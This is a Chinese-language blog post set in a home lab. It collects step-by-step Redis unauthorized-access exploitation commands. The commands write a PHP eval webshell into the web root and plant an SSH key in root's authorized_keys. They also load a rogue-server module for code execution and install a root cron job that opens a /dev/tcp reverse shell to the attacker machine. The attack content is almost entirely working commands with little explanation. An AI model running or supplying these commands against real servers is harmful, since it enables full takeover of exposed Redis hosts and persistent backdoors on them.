Redis未授权访问漏洞利用合集

Aaron_Jㅤ2024-08-18 9:58

一、基本信息

靶机:IP:192.168.100.40

攻击机:IP:192.168.100.60

二、漏洞 & 过程

Redis 未授权访问漏洞利用无口令远程登录靶机

靶机

复制代码

|---|--------------------------------|
| | cd redis-4.0.8/src |
| | ./redis-server ../redis.conf |

攻击机

复制代码

|---|---------------------------------|
| | ./redis-cli -h 192.168.100.40 |

Redis 未授权访问漏洞利用持久化写入一句话木马

攻击机写下如下 redis 命令
复制代码

|---|--------------------------------------------------------------------|
| | config set dir /var/www/html |
| | config set dbfilename test.php |
| | set webshell "\r\n\r\n<?php @eval($_POST['passwd']); ?>\r\n\r\n" |
| | save |

蚁剑连接

Redis 未授权访问漏洞利用公私钥认证获取 root 权限

攻击机 & 靶机

复制代码

|---|---------------------|
| | ssh-keygen -t rsa |

攻击机

复制代码

|---|------------------------------------------------------------------------------|
| | (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt |
| | cat 1.txt | /root/redis-4.0.8/src/redis-cli -h 192.168.100.40 -x set crack |

复制代码

|---|-----------------------------------------|
| | config set dir /root/.ssh |
| | config set dbfilename authorized_keys |
| | save |

远程连接
复制代码

|---|-------------------------------------|
| | ssh -i id_rsa root@192.168.100.40 |

Redis 未授权访问漏洞利用攻击软件获得 shell

攻击机

复制代码

|---|---------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | slaveof 192.168.100.60 6379 |
| | info replication |

复制代码

|---|-----------------------------------------------------|
| | unzip redis-rogue-server-master.zip |
| | cd redis-rogue-server-master/RedisModulesSDK/exp |
| | make |

复制代码

|---|----------------------------------------------------------------------------------------------------------------------------|
| | python3 /root/redis-rogue-server-master/redis-rogue-server.py --rhost 192.168.100.40 --lhost 192.168.100.60 --exp exp.so |

未授权访问漏洞利用持久化写计划任务来反弹一个 shell 权限

攻击机监听端口

复制代码

|---|-----------------|
| | nc -lvvp 8888 |

设置 shell 反弹

复制代码

|---|---------------------------------------------------------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.100.60/8888 0>&1\n\n" |
| | config set dir /var/spool/cron/ |
| | config set dbfilename root |
| | save |

反弹成功

作 者:PeiyuJue

链 接: Redis未授权访问漏洞利用合集 -- Candid Chronicles

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
桌面运维家1 小时前
vDisk安全启动策略怎么应用?防止恶意引导攻击
安全
我是一只puppy1 小时前
使用AI进行代码审查
javascript·人工智能·git·安全·源代码管理
白帽子凯哥哥3 小时前
湖南网安基地:国家级实战化网安人才培养的“黄埔军校”
web安全·信息安全·零基础·渗透测试·安全服务
迎仔3 小时前
10-网络安全监控与事件响应:数字世界的智能监控与应急系统
网络·安全·web安全
惊讶的猫5 小时前
redis分片集群
数据库·redis·缓存·分片集群·海量数据存储·高并发写
期待のcode5 小时前
Redis的主从复制与集群
运维·服务器·redis
jiunian_cn5 小时前
【Redis】渐进式遍历
数据库·redis·缓存
x-cmd6 小时前
[x-cmd] jsoup 1.22.1 版本发布,引入 re2j 引擎,让 HTML 解析更安全高效
前端·安全·html·x-cmd·jsoup
SoleMotive.6 小时前
谢飞机爆笑面经:Java大厂3轮12问真题拆解(Redis穿透/Kafka分区/MCP Agent)
redis·spring cloud·kafka·java面试·mcp
椰子今天很可爱6 小时前
Redis进阶
redis
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南06Linux下V2Ray安装配置指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08在Trae中使用Pencil MCP09Claude Code Skills 实用使用手册10Vue-skills的中文文档